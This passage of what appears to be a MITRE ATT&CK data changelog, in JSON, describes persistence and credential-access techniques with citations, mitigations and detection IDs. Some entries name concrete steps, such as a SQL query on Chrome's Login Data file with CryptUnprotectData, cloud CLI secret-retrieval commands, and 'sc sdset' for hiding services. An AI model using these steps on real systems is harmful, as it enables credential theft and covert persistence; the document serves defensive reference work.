+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-17 16:10:58.592000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Launch Agent",
+                    "description": "Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>~/Library/LaunchAgents</code>.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the <code>Label</code>, <code>ProgramArguments </code>, and <code>RunAtLoad</code> keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.\n\n Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.\n \nAdversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the <code>RunAtLoad</code> or <code>KeepAlive</code> keys set to <code>true</code>.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1543/001",
+                            "external_id": "T1543.001"
+                        },
+                        {
+                            "source_name": "AppleDocs Launch Agent Daemons",
+                            "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.",
+                            "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html"
+                        },
+                        {
+                            "source_name": "Sofacy Komplex Trojan",
+                            "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"
+                        },
+                        {
+                            "source_name": "OceanLotus for OS X",
+                            "description": "Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.",
+                            "url": "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update"
+                        },
+                        {
+                            "source_name": "OSX Keydnap malware",
+                            "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.",
+                            "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/"
+                        },
+                        {
+                            "source_name": "Methods of Mac Malware Persistence",
+                            "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.",
+                            "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"
+                        },
+                        {
+                            "source_name": "OSX Malware Detection",
+                            "description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved November 17, 2024.",
+                            "url": "https://papers.put.as/papers/macosx/2016/RSA_OSX_Malware.pdf"
+                        },
+                        {
+                            "source_name": "Antiquated Mac Malware",
+                            "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.",
+                            "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"
+                        },
+                        {
+                            "source_name": "OSX.Dok Malware",
+                            "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.",
+                            "url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Antonio Piazza, @antman1p"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "macOS"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2025-10-24 17:49:25.367000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0434: Detection of Launch Agent Creation or Modification on macOS"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-17 16:15:19.870000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Systemd Service",
+                    "description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.  \n\nSystemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022) \n\nInside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service)  \n\n* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start.\n* `ExecReload` directive executes when a service restarts. \n* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped.  \n\nAdversaries have created new service files, altered the commands a `.service` file\u2019s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016) \n\nThe `.service` file\u2019s User directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions. \n\nSystemd services can be created via systemd generators, which support the dynamic generation of unit files. Systemd generators are small executables that run during boot or configuration reloads to dynamically create or modify systemd unit files by converting non-native configurations into services, symlinks, or drop-ins (i.e., [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037)).(Citation: Elastic Security Labs Linux Persistence 2024)(Citation: Pepe Berba Systemd 2022)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1543/002",
+                            "external_id": "T1543.002"
+                        },
+                        {
+                            "source_name": "airwalk backdoor unix systems",
+                            "description": "airwalk. (2023, January 1). A guide to backdooring Unix systems. Retrieved May 31, 2023.",
+                            "url": "http://www.ouah.org/backdoors.html"
+                        },
+                        {
+                            "source_name": "Anomali Rocke March 2019",
+                            "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.",
+                            "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"
+                        },
+                        {
+                            "source_name": "freedesktop systemd.service",
+                            "description": "Free Desktop. (n.d.). systemd.service \u2014 Service unit configuration. Retrieved March 20, 2023.",
+                            "url": "https://www.freedesktop.org/software/systemd/man/systemd.service.html"
+                        },
+                        {
+                            "source_name": "Linux man-pages: systemd January 2014",
+                            "description": "Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019.",
+                            "url": "http://man7.org/linux/man-pages/man1/systemd.1.html"
+                        },
+                        {
+                            "source_name": "Pepe Berba Systemd 2022",
+                            "description": "Pepe Berba. (2022, February 7). Hunting for Persistence in Linux (Part 5): Systemd Generators. Retrieved April 8, 2025.",
+                            "url": "https://pberba.github.io/security/2022/02/07/linux-threat-hunting-for-persistence-systemd-generators/"
+                        },
+                        {
+                            "source_name": "Berba hunting linux systemd",
+                            "description": "Pepe Berba. (2022, January 30). Hunting for Persistence in Linux (Part 3): Systemd, Timers, and Cron. Retrieved March 20, 2023.",
+                            "url": "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/"
+                        },
+                        {
+                            "source_name": "Rapid7 Service Persistence 22JUNE2016",
+                            "description": "Rapid7. (2016, June 22). Service Persistence. Retrieved April 23, 2019.",
+                            "url": "https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence"
+                        },
+                        {
+                            "source_name": "Elastic Security Labs Linux Persistence 2024",
+                            "description": "Ruben Groenewoud. (2024, August 20). Linux Detection Engineering -  A primer on persistence mechanisms. Retrieved March 18, 2025.",
+                            "url": "https://www.elastic.co/security-labs/primer-on-persistence-mechanisms"
+                        },
+                        {
+                            "source_name": "lambert systemd 2022",
+                            "description": "Tony Lambert. (2022, November 13). ATT&CK T1501: Understanding systemd service persistence. Retrieved March 20, 2023.",
+                            "url": "https://redcanary.com/blog/attck-t1501-understanding-systemd-service-persistence/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Tony Lambert, Red Canary",
+                        "Emad Al-Mousa, Saudi Aramco",
+                        "Tim (Wadhwa-)Brown",
+                        "Ruben Groenewoud (@RFGroenewoud)"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux"
+                    ],
+                    "x_mitre_version": "1.6",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2025-10-24 17:49:29.942000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.6",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1026: Privileged Account Management",
+                            "M1033: Limit Software Installation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0253: Detection of Systemd Service Creation or Modification on Linux"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-17 19:13:50.402000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "Windows Service",
+                    "description": "Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.\n\nAdversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. \n\nAdversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as \"Bring Your Own Vulnerable Driver\" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)\n\nServices may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002).\n\nTo make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). Adversaries may also create \u2018hidden\u2019 services (i.e., [Hide Artifacts](https://attack.mitre.org/techniques/T1564)), for example by using the `sc sdset` command to set service permissions via the Service Descriptor Definition Language (SDDL). This may hide a Windows service from the view of standard service enumeration methods such as `Get-Service`, `sc query`, and `services.exe`.(Citation: SANS 1)(Citation: SANS 2)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1543/003",
+                            "external_id": "T1543.003"
+                        },
+                        {
+                            "source_name": "Microsoft Windows Event Forwarding FEB 2018",
+                            "description": "Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding to help with intrusion detection. Retrieved August 7, 2018.",
+                            "url": "https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection"
+                        },
+                        {
+                            "source_name": "ESET InvisiMole June 2020",
+                            "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.",
+                            "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf"
+                        },
+                        {
+                            "source_name": "SANS 1",
+                            "description": "Joshua Wright. (2020, October 13). Retrieved March 22, 2024.",
+                            "url": "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/"
+                        },
+                        {
+                            "source_name": "SANS 2",
+                            "description": "Joshua Wright. (2020, October 14). Retrieved March 22, 2024.",
+                            "url": "https://www.sans.org/blog/defense-spotlight-finding-hidden-windows-services/"
+                        },
+                        {
+                            "source_name": "TechNet Services",
+                            "description": "Microsoft. (n.d.). Services. Retrieved June 7, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/library/cc772408.aspx"
+                        },
+                        {
+                            "source_name": "Microsoft 4697 APR 2017",
+                            "description": "Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service was installed in the system. Retrieved August 7, 2018.",
+                            "url": "https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697"
+                        },
+                        {
+                            "source_name": "Symantec W.32 Stuxnet Dossier",
+                            "description": "Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.",
+                            "url": "https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf"
+                        },
+                        {
+                            "source_name": "Unit42 AcidBox June 2020",
+                            "description": "Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.",
+                            "url": "https://unit42.paloaltonetworks.com/acidbox-rare-malware/"
+                        },
+                        {
+                            "source_name": "TechNet Autoruns",
+                            "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"
+                        },
+                        {
+                            "source_name": "Crowdstrike DriveSlayer February 2022",
+                            "description": "Thomas, W. et al. (2022, February 25). CrowdStrike Falcon Protects from New Wiper Malware Used in Ukraine Cyberattacks. Retrieved March 25, 2022.",
+                            "url": "https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Matthew Demaske, Adaptforward",
+                        "Pedro Harrison",
+                        "Mayuresh Dani, Qualys",
+                        "Wietze Beukema @Wietze",
+                        "Akshat Pradhan, Qualys",
+                        "Wirapong Petshagun"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.6",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2026-04-23 18:48:07.774000+00:00\"}}}",
+                    "previous_version": "1.6",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1028: Operating System Configuration",
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1045: Code Signing",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0552: Detection of Windows Service Creation or Modification"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 18:48:28.456000+00:00",
+                    "modified": "2026-05-12 15:12:00.628000+00:00",
+                    "name": "Credentials from Password Stores",
+                    "description": "Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1555",
+                            "external_id": "T1555"
+                        },
+                        {
+                            "source_name": "F-Secure The Dukes",
+                            "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.",
+                            "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.628000+00:00\", \"old_value\": \"2025-10-24 17:48:41.974000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1051: Update Software"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0430: Detect Credentials Access from Password Stores"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--cfb525cc-5494-401d-a82b-2539ca46a561",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-25 12:41:26.501000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Cloud Secrets Management Stores",
+                    "description": "Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.  \n\nSecrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables.  \n\nIf an adversary is able to gain sufficient privileges in a cloud environment \u2013 for example, by obtaining the credentials of high-privileged [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004) or compromising a service that has permission to retrieve secrets \u2013 they may be able to request secrets from the secrets manager. This can be accomplished via commands such as `get-secret-value` in AWS, `gcloud secrets describe` in GCP, and `az key vault secret show` in Azure.(Citation: Permiso Scattered Spider 2023)(Citation: Sysdig ScarletEel 2.0 2023)(Citation: AWS Secrets Manager)(Citation: Google Cloud Secrets)(Citation: Microsoft Azure Key Vault)\n\n**Note:** this technique is distinct from [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005) in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1555/006",
+                            "external_id": "T1555.006"
+                        },
+                        {
+                            "source_name": "Sysdig ScarletEel 2.0 2023",
+                            "description": "Alessandro Brucato. (2023, July 11). SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. Retrieved September 25, 2023.",
+                            "url": "https://sysdig.com/blog/scarleteel-2-0/"
+                        },
+                        {
+                            "source_name": "AWS Secrets Manager",
+                            "description": "AWS. (n.d.). Retrieve secrets from AWS Secrets Manager. Retrieved September 25, 2023.",
+                            "url": "https://docs.aws.amazon.com/secretsmanager/latest/userguide/retrieving-secrets.html"
+                        },
+                        {
+                            "source_name": "Google Cloud Secrets",
+                            "description": "Google Cloud. (n.d.). List secrets and view secret details. Retrieved September 25, 2023.",
+                            "url": "https://cloud.google.com/secret-manager/docs/view-secret-details"
+                        },
+                        {
+                            "source_name": "Permiso Scattered Spider 2023",
+                            "description": "Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.",
+                            "url": "https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud"
+                        },
+                        {
+                            "source_name": "Microsoft Azure Key Vault",
+                            "description": "Microsoft. (2023, January 13). Quickstart: Set and retrieve a secret from Azure Key Vault using Azure CLI. Retrieved September 25, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/azure/key-vault/secrets/quick-create-cli"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Martin McCloskey, Datadog"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2025-04-15 22:03:00.834000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0130: Detect Unauthorized Access to Cloud Secrets Management Stores"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-12 18:57:36.041000+00:00",
+                    "modified": "2026-05-12 15:12:00.635000+00:00",
+                    "name": "Credentials from Web Browsers",
+                    "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, <code>AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data</code> and executing a SQL query: <code>SELECT action_url, username_value, password_value FROM logins;</code>. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function <code>CryptUnprotectData</code>, which uses the victim\u2019s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1555/003",
+                            "external_id": "T1555.003"
+                        },
+                        {
+                            "source_name": "GitHub Mimikittenz July 2016",
+                            "description": "Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz. Retrieved June 20, 2019.",
+                            "url": "https://github.com/putterpanda/mimikittenz"
+                        },
+                        {
+                            "source_name": "Talos Olympic Destroyer 2018",
+                            "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.",
+                            "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html"
+                        },
+                        {
+                            "source_name": "Microsoft CryptUnprotectData April 2018",
+                            "description": "Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved June 18, 2019.",
+                            "url": "https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata"
+                        },
+                        {
+                            "source_name": "Proofpoint Vega Credential Stealer May 2018",
+                            "description": "Proofpoint. (2018, May 10). New Vega Stealer shines brightly in targeted campaign . Retrieved June 18, 2019.",
+                            "url": "https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign"
+                        },
+                        {
+                            "source_name": "FireEye HawkEye Malware July 2017",
+                            "description": "Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18, 2019.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html"
+                        }
